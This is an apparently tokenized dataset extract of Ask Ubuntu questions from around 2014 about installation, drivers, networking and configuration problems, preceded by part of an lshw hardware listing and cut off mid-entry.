*-pci:11 description : host bridge product : k8 [ athlon64/opteron ] miscellaneous control vendor : advanced micro devices , inc. [ amd ] physical id : 10b bus info : pci @ 0000:00:18.3 version : 00 width : 32 bits clock : 33mhz configuration : driver=k8temp resources : irq:0 *-multimedia description : audio device product : vt8237a/vt8251 hda controller vendor : via technologies , inc. physical id : 1 bus info : pci @ 0000:80:01.0 version : 10 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list configuration : driver=snd_hda_intel latency=0 resources : irq:17 memory : afffc000-afffffff *-scsi:0 physical id : 2 logical name : scsi2 capabilities : emulated *-disk:0 description : ata disk product : wdc wd1600ab-22d vendor : western digital physical id : 0.0.0 bus info : scsi @ 2:0.0.0 logical name : /dev/sda version : 15.0 serial : wd-wcaek1160784 size : 149gib ( 160gb ) capabilities : partitioned partitioned : dos configuration : ansiversion=5 sectorsize=512 signature=0005cb4f *-volume:0 description : ext4 volume vendor : linux physical id : 1 bus info : scsi @ 2:0.0.0,1 logical name : /dev/sda1 logical name : / version : 1.0 serial : 3cec4927-961e-4dc9-be15-fac612a854b0 size : 147gib capacity : 147gib capabilities : primary bootable journaled extended_attributes large_files huge_files dir_nlink extents ext4 ext2 initialized configuration : created=2014-05-19 20:40:13 filesystem=ext4 lastmountpoint=/ modified=2014-05-21 10:37:15 mount.fstype=ext4 mount.options=rw , relatime , errors=remount-ro , data=ordered mounted=2014-05-21 10:37:15 state=mounted *-volume:1 description : extended partition physical id : 2 bus info : scsi @ 2:0.0.0,2 logical name : /dev/sda2 size : 2045mib capacity : 2045mib capabilities : primary extended partitioned partitioned : extended *-logicalvolume description : linux swap / solaris partition physical id : 5 logical name : /dev/sda5 capacity : 2045mib capabilities : nofs *-disk:1 description : ata disk product : st3120020a vendor : seagate physical id : 0.1.0 bus info : scsi @ 2:0.1.0 logical name : /dev/sdb version : 3.31 serial : 3ka1sjzx size : 111gib ( 120gb ) capabilities : partitioned partitioned : dos configuration : ansiversion=5 sectorsize=512 signature=4b36adea *-volume description : windows ntfs volume physical id : 1 bus info : scsi @ 2:0.1.0,1 logical name : /dev/sdb1 version : 3.1 serial : 160bc649-fff3-a04c-ad93-8f7430e55541 size : 111gib capacity : 111gib capabilities : primary ntfs initialized configuration : clustersize=4096 created=2013-02-26 17:14:57 filesystem=ntfs modified_by_chkdsk=true mounted_on_nt4=true resize_log_file=true state=dirty upgrade_on_mount=true *-scsi:1 physical id : 3 logical name : scsi3 capabilities : emulated *-cdrom:0 description : dvd-ram writer product : dvdrw shm-165h6s vendor : lite-on physical id : 0.0.0 bus info : scsi @ 3:0.0.0 logical name : /dev/cdrom logical name : /dev/sr0 logical name : /media/juan/nsa320 version : hs0d capabilities : removable audio cd-r cd-rw dvd dvd-r dvd-ram configuration : ansiversion=5 mount.fstype=iso9660 mount.options=ro , nosuid , nodev , relatime , uid=1000 , gid=1000 , iocharset=utf8 , mode=0400 , dmode=0500 state=mounted status=ready *-medium physical id : 0 logical name : /dev/cdrom logical name : /media/juan/nsa320 configuration : mount.fstype=iso9660 mount.options=ro , nosuid , nodev , relatime , uid=1000 , gid=1000 , iocharset=utf8 , mode=0400 , dmode=0500 state=mounted *-cdrom:1 description : dvd writer product : dvd+-rw dvd8801 vendor : philips physical id : 0.1.0 bus info : scsi @ 3:0.1.0 logical name : /dev/sr1 version : 2d06 capabilities : removable audio cd-r cd-rw dvd dvd-r configuration : ansiversion=5 status=nodisc *-scsi:2 physical id : 4 bus info : usb @ 1:4 logical name : scsi4 capabilities : emulated scsi-host configuration : driver=usb-storage *-disk description : scsi disk physical id : 0.0.0 bus info : scsi @ 4:0.0.0 logical name : /dev/sdc size : 2007mib ( 2104mb ) capabilities : partitioned partitioned : dos configuration : sectorsize=512 signature=759f2192 *-volume description : windows fat volume vendor : msdos5.0 physical id : 1 bus info : scsi @ 4:0.0.0,1 logical name : /dev/sdc1 logical name : /media/juan/do not use version : fat16 serial : aa43-9db8 size : 1899mib capacity : 1900mib capabilities : primary fat initialized configuration : fats=2 filesystem=fat mount.fstype=vfat mount.options=rw , nosuid , nodev , relatime , uid=1000 , gid=1000 , fmask=0022 , dmask=0077 , codepage=437 , iocharset=iso8859-1 , shortname=mixed , showexec , utf8 , flush , errors=remount-ro state=mounted *-scsi:3 physical id : 5 bus info : usb @ 5:1 logical name : scsi5 capabilities : emulated scsi-host configuration : driver=usb-storage *-disk:0 description : scsi disk physical id : 0.0.0 bus info : scsi @ 5:0.0.0 logical name : /dev/sdd configuration : sectorsize=512 *-disk:1 description : scsi disk physical id : 0.0.1 bus info : scsi @ 5:0.0.1 logical name : /dev/sde configuration : sectorsize=512 *-disk:2 description : scsi disk physical id : 0.0.2 bus info : scsi @ 5:0.0.2 logical name : /dev/sdf configuration : sectorsize=512 *-disk:3 description : scsi disk physical id : 0.0.3 bus info : scsi @ 5:0.0.3 logical name : /dev/sdg configuration : sectorsize=512
470330	configuring mysql-server-5.5 ( amd64 ) hangs during installation	i run sudo apt-get install tasksel then i choose lamp server then i 've been waiting to finish the configuration and when it comes to 81 % which is configuring mysql-server-5.5 ( amd64 ) the configuration hangs in there . i 'm new to ubuntu so i want to ask if i exit the terminal or kill it is there any corruption thing will happen ? or what alternatives i need to do ? please see image below . thanks !
470331	kde 4.13 and oxygen transparent	hi guys i downloaded and installed kubuntu 14.04 yesterday and set all options and customization as i want but one of my favourite options is set my widget style to oxygen-transparent which make whole desktop environment kde to be have transparent i can do that to kde 4.11 but after installed kubuntu 14.04 which came with kde 4.13 this theme ca n't work and does n't make my desktop environment to be transparent is oxygen-transparent not compatible anymore with higher kde version ? ? ? http : //kde-look.org/content/show.php/oxygen-transparent ? content=127752
470332	which bit-torrent app has these specific features ?	i 'm searching for an ubuntu bit-torrent client that has these two features : start the download when idle ( and pause download when user interacts with system ) download files in sequential order
470337	installing ubuntu 14.04 along windows to dual boot	i am trying to install ubuntu 14.04 on a computer that already has windows 7 installed . when going through the installation steps it says that no other os is found . how do i get back to windows . i want to dual boot .
470338	lenovo ideapad ( u430 touch ) only charges up to 59 %	i just installed ubuntu 14.04 lts on my lenovo ideapad u430 touch . how come the battery just charges up to 59 % ? i also have win8 on another partion and it easily reaches 100 % . i tried `` tlp '' but nothing changed . i 've read some complaints from people who have a similar problem but they all have thinkpads and there 's a special modul for `` tlp '' where you can control the charging threshold . what to do ?
470348	maximize window in ubuntu 14.04 goes to wrong screen	when i open e.g . a terminal when my pointer is on the left screen , it opens up in the right . i installed compiz as suggested , enabled `` place windows '' and played with the settings . it does n't seem to affect anything . do i need to restart compiz or something after i change the setting ?
470349	installing oracle database 12c on ubuntu 14.04	is there anyone out there that got oracle 12c working on ubuntu 14.04 ? i tried following this tutorial ( which is written for installing oracle 12c on ubuntu 12.04 ) : http : //gemsofprogramming.wordpress.com/2013/09/19/installing-oracle-12c-on-ubuntu-12-04-64-bit-a-hard-journey-but-its-worth-it/ but in linking faze i encountered some errors that were not mentioned in this tutorial . if there is anyone out there that got it to work , i would be very grateful if they could share their insight .
470351	why wo n't my oce c360 print on upgrade to 14.04	our office uses oce c360 by konica minolta and the generic driver ( pcl 5e ) only prints black and white , so we use the linux driver provided by konica minolta , but that wo n't print at all and sometimes makes the printer hang and needs to be unplugged . this is a pain and not a good idea . is this a driver issue ? in 13.10 it worked fine to have one printer as the generic b/w printer , and install a new printer using the koc360opn.ppd and this was great ( even though it would only print one sided ) . upon upgrade to 14.04 , the generic driver is sketchy to work and the koc360 driver wo n't print at all . do i need a different driver ?
470352	cant install jockey-gtk	i am trying to install jockey on lubuntu to resolve an issue with my ath-ar5bxb63 wifi card and get this ... . linuxtop @ linuxtop-hp-g6000-notebook-pc : ~ $ sudo apt-get install jockey-gtk [ sudo ] password for linuxtop : reading package lists ... done building dependency tree reading state information ... done note , selecting 'ubuntu-drivers-common ' instead of 'jockey-gtk' ubuntu-drivers-common is already the newest version . 0 to upgrade , 0 to newly install , 0 to remove and 89 not to upgrade . linuxtop @ linuxtop-hp-g6000-notebook-pc : ~ $ no idea what it is trying to do but any help would be appreciated
470360	installing ubuntu 14.04 error	so first of all , i have absolutely no idea what i 'm doing . i 'm trying to install ubuntu 14.04 along side windows 7 using the windows installer included in the download , but then when i go to restart and finish the installation , i get this error : http : //i.imgur.com/yzna0cr.jpg i at first figured this to be a simple download error , retrying the download twice more after that ( once in the browser , once in a torrent client ) , verifying the md5 sum both times , with neither download working . as stated earlier , i have absolutely no idea what i 'm doing with installing any operating system other than windows , so i 'd really appreciate some guidance as to if i 'm doing something incorrectly . thanks ! edit : mcelog decode output $ mcelog -- ascii cpu 0 : machine check exception : 5 bank 4 : be00000000800400 rip ! inexact ! 10 : < ffffffff813d340b > { intel_idle+0xab/0x100 } tsc 1db9128ac4 addr ffffffff8136f8f0 misc ffffffff813bf8f0 processor 0:306c3 time 1396513815 socket 0 apic 0 microcode 9cpu 0 : machine check exception : 5 bank 4 : be00000000800400 tsc 1db9128ac4 addr ffffffff8136f8f0 misc ffffffff813bf8f0 hardware event . this is not a software error . cpu 0 bank 4 tsc 1db9128ac4 rip ! inexact ! 10 : ffffffff813d340b misc ffffffff813bf8f0 addr ffffffff8136f8f0 time 1396513815 thu apr 3 09:30:15 2014 status be00000000800400 mcgstatus 5 cpuid vendor intel family 6 model 60 rip : intel_idle+0xab/0x100 } processor 0:306c3 time 1396513815 socket 0 apic 0 microcode 9
470364	pxe boot installation cd-rom can not be mounted	i am trying to install ubuntu via pxe boot but unfortunately its not working . i am trying to use the iso image i have as a local mirror to the installation . but installation stopped instatantly telling that it is unable to mount cdrom . i found some great tutorials here about the steps : how to use a .iso image as a cd-rom repository ? but its not working facing same problem . any suggestions ? thx its not being exported over nfs i dont know the reason . here is my default file : prompt 1 timeout 20 default install label install menu label ^install ubuntu kernel iso-image/ubuntu12.04amd64/install/vmlinuz append file=http : // '' server ip '' /iso-image/ubuntu12.04amd64/preseed/preseed.seed interface=eth1 priority=critical locale=en_us.utf-8 console-setup/ask_detect=false keyboard-configuration/layoutcode=us netboot=nfs nfsroot= '' server ip '' : /srv/boot/iso-image/ubuntu12.04amd64 initrd=iso-image/ubuntu12.04amd64/install/netboot/ubuntu-installer/amd64/initrd.gz
470375	keyboard shortcuts keep resetting	there is a conflict between the ubuntu keyboard shortcut ctrl-alt-s ( which does `` toggle shaded state '' ) and the emacs macro ctrl-alt-s , which invokes forward-search-regex , which of course is vastly more useful than `` toggle shaded state . '' in keyboard settings , i deleted the shortcut for `` toggle shaded state , '' and that makes the emacs macro work properly . but sometimes the ubuntu shortcut reasserts itself unexpectedly , so i have to go to system settings to delete that shortcut again . it does n't always happen on restart . today it happened while i was working in emacs - one minute ctrl-alt-s invoked the regular expression search , the next minute it went crazy . how can i delete the ubuntu keyboard shortcut permanently ?
470377	ctrl + z opens chromium	anyone has this problem ? i think i need to reset the keyboard shortcuts , but i do n't know how to do it . i read many posts regarding that , but none of them seem to work . btw i 'm using ubuntu 14.04
470379	ubuntu 14.04 - i/o error during usb installation	i installed ubuntu 14.04 on a usb using universal-usb-installer-1.9.5.2 and i installed the 64-bit version . i want to put ubuntu on my mom 's laptop . we already had ubuntu on it ( v 14.04 ) but it was really laggy and it had graphics problems ( it would n't start the laptop at all ) . i wanted to do a re-install . about half-way into the installation , where it says to choose which partition to install , i chose to erase the main drive and install it on that . it went through , then there was an error about the installation files being corrupt . it said something like this : [ errno 5 ] input/output error this is often due to a faulty cd/dvd disk or drive , or a faulty hard disk . it may help to clean the cd/dvd , to burn the cd/dvd at a lower speed , to clean the cd/dvd drive lens ( cleaning kits are often available from electronics suppliers ) , to check whether the hard disk is old and in need of replacement , or to move the system to a cooler environment i restarted the laptop and kept trying it again . i formatted the usb multiple times and kept trying . no luck , i keep getting this error . then , this started happening : http : //imgur.com/a/6egml after the last image the mouse disappears and you ca n't do anything . i checked the md5sum of the iso file and it 's the same and there are no problems . what do i do ?
470380	restore windows 8.1 from restore drive - ubuntu	i want to install ubuntu 14.04 on my aspire e1-510p-4614 , so i have created a usb recovery drive using windows 8.1 am i able to install ubuntu ( erase it all ) and in the future , restore my windows 8.1 using that usb recovery drive i made ? a simple yes or no would suffice . i ca n't use a disk and do n't want to dual-boot . thanks in advance for any help..
470381	writing to /proc/irq/*/smp_affinity as root	here is the command i issued : root @ vishal-think : ~ # echo `` 0 '' > /proc/irq/0/smp_affinity and here is the error : -bash : echo : write error : input/output error the ls command shows that root has write permissions : root @ vishal-think : ~ # ls -l /proc/irq/0/smp_affinity -rw -- -- -- - 1 root root 0 may 21 16:30 /proc/irq/0/smp_affinity please tell me how i could fix this . another question of mine is that even after disabling irqbalance and rebooting the machine , i still see interrupts going to cpus other than cpu0 . why could that be happening ?
470383	how to avoid prompt password for sudo ?	i know i can go root ( super user ) via the su command but i have to authorize it after firing the commands . is there a way i can go root and authorize ( with password ) in one line
470384	is it possible to use secret-tool to lookup existing seahorse passwords ?	i found this post about getting passwords from the gnome keyring from commandline ( how do i get passwords from the keyring in the terminal for usage in scripts ? ) , and i found that secret-tool is the way to go . it 's great that i can store passwords with secret-tool , but i ca n't seem to figure out how to lookup existing passwords that were stored using seahorse , which is what i 'm really hoping to do . i do n't know what attribute ( s ) and value ( s ) i would need to use to query them , and the man page is fairly vague on what these could possibly be .
470386	management of groups ( labs ) of client systems	i work for a school district that now has several hundred unsupported win xp systems . these systems , while not great , are too good to throw away - they are also too old to update to win 7 . i have installed ubuntu on my systems , and for friends and family along the way with great results . have n't had much experience in a school environment . here is the question . in the mac or chrome world , we can enroll systems into a management system and then push software and updates to the clients without having to go touch each one ( i have a very small tech department , so having the ability to manage systems like this is a real plus ) . i have been looking for a similar management system in the ubuntu world , but have not been able to find anything so far . is there such a beast ? any suggestions would be appreciated . thanks chris
470388	how do i get the touchpad working on an asus x450l ?	i 've been using ubuntu for a couple of weeks now and have been surviving without my touchpad . i have asus x450l laptop . are there drivers available so my trackpad will function again ? it works on windows 8.1 but not on ubuntu . i tried reinstalling the synaptics and all sorts of things .
470389	ubuntu session not starting unity	i 've been fiddling around with different desktop environments lately . i started with gnome fallback , then gnome 3 then xfce and now i decided to use unity . i installed ubuntu-desktop and launched `` ubuntu '' in lightdm but no panel or launcher appears . to make them appear i need to do ctrl+alt+f1 , login and execute : export display=:0 setsid unity it then appears after i execute that but every time i login i need to do that . in addition , there are no indicators in the top right corner . does anyone know how i can make the indicators appear and make the launcher and panel appear when i log in ? thanks ,
470393	help booting windows 8 ( and possible other problems )	here are my files ... 1.0 tb hard disk cd/dvd drive ( nodus probably ) 7.9 gb drive ( i will explain its importance ) other devices 967 mb loop device =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= i installed ubuntu 14.04 as a dual boot . everything works properly but whenever i shut down my computer and turn it back on ( hoping to get to the which os screen ) i have to have the usb in otherwise it says `` ca n't boot hard-drive ( something 3 something ) '' along the lines of that . when i do have the usb in however , i get to the grub installation menu ... also i forgot to make it so windows shuts down all the way . it is still on that `` snapshot '' thing .
470395	ca n't add ppa ( cinnamon-stable )	trying to add the ppa for the cinnamon desktop as suggested by many sites ( e.g . how do i install the cinnamon desktop ? ) gives the following error : ~ $ sudo add-apt-repository ppa : gwendal-lebihan-dev/cinnamon-stable you are about to add the following ppa to your system : tag : launchpad.net:2008 : redacted more info : https : //launchpad.net/~gwendal-lebihan-dev/+archive/cinnamon-stable press [ enter ] to continue or ctrl-c to cancel adding it gpg : keyring `/tmp/tmpnaemck/secring.gpg ' created gpg : keyring `/tmp/tmpnaemck/pubring.gpg ' created gpg : `` tag : launchpad.net:2008 : redacted '' not a key id : skipping recv failed i understand that this type of error comes up when a ppa is no longer being maintained ( but there is no indication of this for the cinnamon-stable ppa on forums etc . ) i 'm able to add other ppas without error ( cinnamon-nightly works just fine , but i do n't want an unstable release ) . any suggestions on how to resolve this ? edit : i should have mentioned i 'm using ubuntu 12.04 edit ( 23/05/2014 ) : my question has been marked duplicate because the answer on [ how do i install the cinnamon desktop ? ] has since changed to reflect the status of the ppa ( it has been deleted ) . however , i think my question should remain here because it highlight the error that users will experience if they follow the cinnamon installation instructions on the many fora out there .
470398	how do i get my broadcom driver to work from my mac ?	i am using gnome ubuntu 14.04 ( trusty tahr ) and a major problem i came across was that i could not connect t wireless . when using normal ubuntu , i could go to the system preferences and add the permission for the driver that i needed . on gnome ubuntu , i can not .i am using a late 2013 macbook pro , with no ethernet cable , and no other method of connecting to the internet . i have no cd drove , so i installed from a usb . i was looking at this : setup problems ubuntu 14.04 wifi on macbookpro 13.3 w/ retina ( dual boot ) and i thought i had figured out what was wrong through chili 's answer , but i am not able to navigate to pool help please
470400	i can not see the videos webapps youtube	when entering the web application from youtube , i can not see the videos because i have not installed plash plugin . how do i install it ?
470404	why did a program install when i did n't install it ?	a program called python-netifaces ( 0.8-3build1 , automatic ) installed without my installing it . i was trying to install gufw on a standard account on a fully up to date , newly-installed ubuntu 14.04 . anyone know if this is abnormal or it 's just supposed to be there even though i did n't explicitly install it ?
470406	matlab wo n't open after fresh installation !	i installed matlab on a new ubuntu 14.04 installation . i do n't get any errors , but when i try to run it in the terminal with the matlab command , the screen does n't advance past the matlab logo : i 'm not sure what to do because it 's not giving me any errors . i 've already tried reinstalling matlab . any advice would be appreciated , i 'm unfamiliar with the ubuntu environment .
470409	how to force device node for usb device on ubuntu	i want a particular usb device assigned to a given node usb on ubuntu 12.10. lssub shows bus 002 device 003 : id 19d2:0031 zte wcdma technologies msm mf110/mf627/mf636 now zte wcdma technologies msm mf110/mf627/mf636 its assigned to /dev/ttyusb2 . sometimes ( doing nothing ) it changes to /dev/ttyusb3 . how can i fix this ? i need this device to work only with a determinated usb node . i read this two articles about udev http : //noctis.de/archives/16-howto-fixed-name-for-a-udev-device.html http : //www.redhat.com/magazine/002dec04/features/udev/ but i cant make it work . can you helpme ? thanks
470412	install on a large btrfs partition with two sub volumes	i have a computer with a large btrfs partition containing two sub volumes / and /home . they are both compressed . there 's also a separate swap partition . the /home partition has data on it and i hoping to keep that date in /home on the new install and use / for the ubuntu os installation . will it be possible to do this ? i have done it many times with ext4 partitions , but not with btrfs like this machine has .
470414	grub 2 not working	so here 's the thing , i recently installed ubuntu 14 . everything works fine except the boot loader . i currently have windows 7 installed on another hard drive . but when i boot the machine i get a black screen with a purple border , and then it boots directly into ubuntu . i tried re installing grub 2 and loading the boot repair but neither worked .
470417	email body empty when i use `` echo '' in mutt commandline mode with root account	i have use mutt to send mails . it works fine when i use my own user account : e.g . echo `` foo bar '' | mutt mymail @ mymail.com however , when i put the above command in /etc/lightdm/lightdm.conf ( i want to receive the mail every time my pc is started ) , the command will be executed with root account , but the mails i receive has no contents in the email body ( no `` foo bar '' is shown in the mail ) . how can i echo the contents in mutt when i use root account ?
470418	ubuntu 14.04 dvd stuck	i downloaded ubuntu desktop to a dvd , restarted the pc with the dvd in the drawer , as instructed , the desktop came up with the keyboard shortcuts on the monitor and wo n't go anywhere . i have clicked the curser all over the screen but ca n't get anything to move , open , close , drag and drop or see any activity . none of the icons on the left side will open . where do i go from here ? please help .
470421	send e-mails from a server , preventing from being blocked by anti-spam	i have a domain that points to server a . there is an 'a ' entry in the dns table of this server pointing to a server b . my website visitors will see the page hosted in the server b , not a. mx entries are pointing to gmail ( google apps ) . when i use the php mail function to dispatch messages from server b , am i at risk of being blocked by antispam filter ? if yes , how can i solve it ?
470425	issue with gedit printing	i executed gedit and printed some texts with it in ubuntu 12.04 lts . but i think that it 's not doing it correctly . perhaps i do n't know how to use gedit . please help me with the way how to solve it .
470427	reset or restore previous installation of ubuntu 14.04	i 'm new to ubuntu and i have a windows 8.1 and ubuntu 14.04 in my machine and i want to restore or reset my ubuntu . how can i have a new ubuntu like fresh installation ? if there 's no way on how to do that then how can i uninstall it from dual boot and reinstall it ? i hope it wo n't affect the boot process on my machine .
470428	network set up issues with win7	been trying to convert to ubuntu for a while , so last month after ms dropped xp support , it was time to dig in and make it happen . i 'm fairly computer and coding literate , but i 'm a total noob on the networking stuff . i 've searched and read many threads . just too confused at this point . running 12.04 on my desk top machine . my wifes laptop is on windows 7 . currently i can access the shared directories on her laptop . on her laptop , my computer is not visible on the network , but if i type in my ip address , i can get to 2 of the folders i 've shared . no login required . i need to make it visible . she 'll never remember how to use the ip address . one of these folders are in home , the other is on the desktop . both of these i was able to set up sharing in the properties window and let nautilus set the permissions . i need to share another folder that resides on a partitioned drive . this drive has the name `` g files '' . its is /media/g files/pictures . when i check permissions on the 2 currently shared folders , they belong to the group sambashare . g files group is owned by myself , but i can not change it . i have the samba application installed . though i 'm trying to define everything using `` the classic '' method . from reading previous threads , here 's a few items that i 've seen asked for . copy of the smb.conf file ( commented lines removed ) : [ global ] workgroup = blackhole server string = % h server ( samba , ubuntu ) ; wins support = no ; wins server = w.x.y.z ; dns proxy = no ; name resolve order = lmhosts host wins bcast ; interfaces = 127.0.0.0/8 eth0 ; bind interfaces only = yes log file = /var/log/samba/log. % m max log size = 1000 syslog = 0 panic action = /usr/share/samba/panic-action % d ; security = user encrypt passwords = yes ; passdb backend = tdbsam obey pam restrictions = yes unix password sync = yes passwd program = /usr/bin/passwd % u passwd chat = *enter\snew\s*\spassword : * % n\n *retype\snew\s*\spassword : * % n\n *password\supdated\ssuccessfully* . ; pam password change = yes map to guest = bad user ; domain logons = yes ; logon path = \\ % n\profiles\ % u ; logon drive = h : ; logon script = logon.cmd ; add user script = /usr/sbin/adduser -- quiet -- disabled-password -- gecos `` '' % u ; add machine script = /usr/sbin/useradd -g machines -c `` % u machine account '' -d /var/lib/samba -s /bin/false % u ; add group script = /usr/sbin/addgroup -- force-badname % g ; printing = bsd ; printcap name = /etc/printcap ; printing = cups ; printcap name = cups ; include = /home/samba/etc/smb.conf. % m ; message command = /bin/sh -c '/usr/bin/linpopup `` % f '' `` % m '' % s ; rm % s ' & ; idmap uid = 10000-20000 ; idmap gid = 10000-20000 ; template shell = /bin/bash ; winbind enum groups = yes ; winbind enum users = yes ; usershare max shares = 100 usershare allow guests = yes username map = /etc/samba/smbusers ; security = user guest ok = yes guest account = guest ; [ homes ] ; comment = home directories ; path = /media/g files ; browseable = yes ; guest ok = yes ; read only = no ; create mask = 0755 ; directory mask = 0755 ; valid users = % s ; [ netlogon ] ; comment = network logon service ; path = /home/samba/netlogon ; guest ok = yes ; read only = yes ; [ profiles ] ; comment = users profiles ; path = /home/samba/profiles ; guest ok = no ; browseable = no ; create mask = 0600 ; directory mask = 0700 [ printers ] comment = all printers browseable = no path = /var/spool/samba printable = yes ; guest ok = no ; read only = yes create mask = 0700 [ print $ ] comment = printer drivers path = /var/lib/samba/printers ; browseable = yes writeable = yes guest ok = yes ; write list = root , @ lpadmin ; [ cdrom ] ; comment = samba server 's cd-rom ; read only = yes ; locking = no ; path = /cdrom ; guest ok = yes ; preexec = /bin/mount /cdrom ; postexec = /bin/umount /cdrom this shows i 'm the owner of `` g files '' , not root . if i unmount the drive , this goes away . todd @ todd-office-linux : ~ $ ll -a /media total 72 drwxr-xr-x 9 root root 4096 may 21 06:49 ./ drwxr-xr-x 23 root root 4096 may 4 07:48 ../ lrwxrwxrwx 1 root root 6 dec 22 2009 cdrom - > cdrom0/ drwxr-xr-x 2 root root 4096 dec 22 2009 cdrom0/ drwx -- -- -- 2 root root 4096 sep 6 2011 c win os/ lrwxrwxrwx 1 root root 7 dec 22 2009 floppy - > floppy0/ drwxr-xr-x 2 root root 4096 dec 22 2009 floppy0/ drwx -- -- -- 2 root root 4096 sep 6 2011 freeagent drive/ drwx -- -- -- 1 todd todd 8192 may 17 11:23 freeagent drive_/ drwx -- -- -- 1 todd todd 36864 may 17 10:57 g files/ drwxr-xr-x 2 root root 4096 jan 15 2010 home/ i 've unmounted the drive and tried to change the owner to root and also change permissions ( chown and chmod ) . neither worked or threw any error messages . i 'd like to also share a directory on the external usb drive `` freeagent drive '' , but that 's lower priority right now . todd @ todd-office-linux : ~ $ ifconfig eth0 link encap : ethernet hwaddr 00:26:18:4a:26 : c1 inet addr:192.168.1.7 bcast:192.168.1.255 mask:255.255.255.0 inet6 addr : fe80 : :226:18ff : fe4a:26c1/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:187636 errors:0 dropped:0 overruns:0 frame:0 tx packets:160829 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:186067628 ( 186.0 mb ) tx bytes:25286637 ( 25.2 mb ) interrupt:18 eth1 link encap : ethernet hwaddr 00:26:18:4a:23:6f up broadcast multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) interrupt:17 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:1262 errors:0 dropped:0 overruns:0 frame:0 tx packets:1262 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:110133 ( 110.1 kb ) tx bytes:110133 ( 110.1 kb ) output from ipconfig off laptop : windows ip configuration wireless lan adapter wireless network connection : connection-specific dns suffix . : hsd1.co.comcast.net . link-local ipv6 address . . . . . : fe80 : :985b : b7b7 : fe15:99f3 % 15 ipv4 address . . . . . . . . . . . : 192.168.1.10 subnet mask . . . . . . . . . . . : 255.255.255.0 default gateway . . . . . . . . . : 192.168.1.1 tunnel adapter isatap.hsd1.co.comcast.net . : media state . . . . . . . . . . . : media disconnected connection-specific dns suffix . : hsd1.co.comcast.net . tunnel adapter isatap . { 64d221c1-5a17-4351-88bf-ffcaee3aa59c } : media state . . . . . . . . . . . : media disconnected connection-specific dns suffix . : tunnel adapter teredo tunneling pseudo-interface : connection-specific dns suffix . : ipv6 address . . . . . . . . . . . : 2001:0:9d38:90d7:4f8:34fa:3f57 : fef5 link-local ipv6 address . . . . . : fe80 : :4f8:34fa:3f57 : fef5 % 18 default gateway . . . . . . . . . : : :
470429	cras audio & video stopped working [ chromebook ]	it all seemed to start after updating chromeos . ( i 'm running ubuntu inside of chromeos ( crouton ) ) i have no audio , ( and video is hit-and-miss , either broken or working ) . i tried to manually turn the volume up with command-line on the chance the keys may have gotten rebinded or something and get the error : cras client would n't connect . then i tried to connect to hdmi ( just to see if it would work ) and got the error : gstreamer was unable to detect sound devices ( paraphrasing ) any help would be hugely appreciated.. a lot of errors i can deal with , but no audio/video is super inconvenient .
470432	error while trying to run pycocuma contact management program	i need help understanding this message ! mainctrl = maincontroller ( ) file `` /usr/lib/python2.7/dist-packages/pycocumalib/maincontroller.py '' , line 79 , in __init__ self.view = view = mainview ( __version__ , self.model , tkroot ) file `` /usr/lib/python2.7/dist-packages/pycocumalib/mainview.py '' , line 50 , in __init__ self.createwidgets ( ) file `` /usr/lib/python2.7/dist-packages/pycocumalib/mainview.py '' , line 197 , in createwidgets self._menubar = menu ( self.tkroot ) file `` /usr/lib/python2.7/lib-tk/tkinter.py '' , line 2583 , in __init__ widget.__init__ ( self , master , 'menu ' , cnf , kw ) file `` /usr/lib/python2.7/lib-tk/tkinter.py '' , line 1977 , in __init__ ( widgetname , self._w ) + extra + self._options ( cnf ) ) _tkinter.tclerror : expected integer but got `` ''
470434	what download tab do i use to download to removable disc ?	when i try to download it starts downloading to lap top , i want it on removable disc
470436	steam can not set up steam data	so , i am fairly new to xubuntu , and have just made a fresh install . i decided to get steam , so i used the software center to install steam , but i am encountering problems . running steam from the start menu simply brings up a box saying : could n't set up steam data - please contact technical support and running it from the terminal produces : alex @ craptop : ~ $ steam repairing installation , linking /home/alex/.steam/steam to /home/alex/.local/share/steam rm : can not remove ‘/home/alex/.steam/steam’ : is a directory setting up steam content in /home/alex/.local/share/steam rm : can not remove ‘/home/alex/.steam/steam’ : is a directory '' tried re-installing twice now , and am still getting the error saying it could n't set up steam data .
470437	unison fail ? ignore path and time stamp	trying to set up unison version 2.40.65 on two ubuntu 12.04 lts desktop computers . the primary computer is a system76 . the secondary computer is a late 2012 apple mini mac that no longer has os x on it . both computers have ext4 file systems installed . i decided to test unison before using it for critical syncing since i had a previous experience with windows to windows syncing program that was barely usable ( as in slow , unstable , and god help you if the network went down ) . i tested all those faults with unison and it passed by a wide margin . i have a significant problem with unison ignore = path . i set the ignore using the gui and editing the profile file . when a folder or file gets added inside the last folder in the path , unison wants to add the new stuff to the opposite computer from where it was added . so ignore does work according to the definition in the unison documentation : ignore xxx including the preference -ignore pathspec causes unison to completely ignore paths that match pathspec ( as well as their children ) . this is useful for avoiding synchronizing temporary files , object files , etc . the syntax of pathspec is described in the path specification section , and further details on ignoring paths is found in the ignoring paths section . what i seeing in my test counter to â ( as well as their children ) â . i was hoping ignore = path meant no matter what always ignore every change in that path . here is a copy of my working test unison profile : label = test2 root = /home/butest/documents root = ssh : //butest @ 169.254.8.108//home/butest/documents sshargs = -c ignore = path documents/4_significant_events/* here is a list of the ignore = path combination i 've tried with no success . they either throw an exception or had the same behavior as above . ignore = path home/butest/document/4_significant_events ignore = path /home/butest/document/4_significant_events ignore = path //home/butest/document/4_significant_events/ ignore = path { home/butest/document/4_significant_events } ignore = path { /home/butest/document/4_significant_events } ignore = path { //home/butest/document/4_significant_events/ } ignore = path home/butest/document/4_significant_events* ignore = path /home/butest/document/4_significant_events* ignore = path //home/butest/document/4_significant_events*/ ignore = path { home/butest/document/4_significant_events* } ignore = path { /home/butest/document/4_significant_events* } ignore = path { //home/butest/document/4_significant_events/* } ignore = path home/butest/document/4_significant_events [ * ] ignore = path /home/butest/document/4_significant_events [ * ] ignore = path //home/butest/document/4_significant_events/ [ * ] ignore = path { home/butest/document/4_significant_events [ * ] } ignore = path { 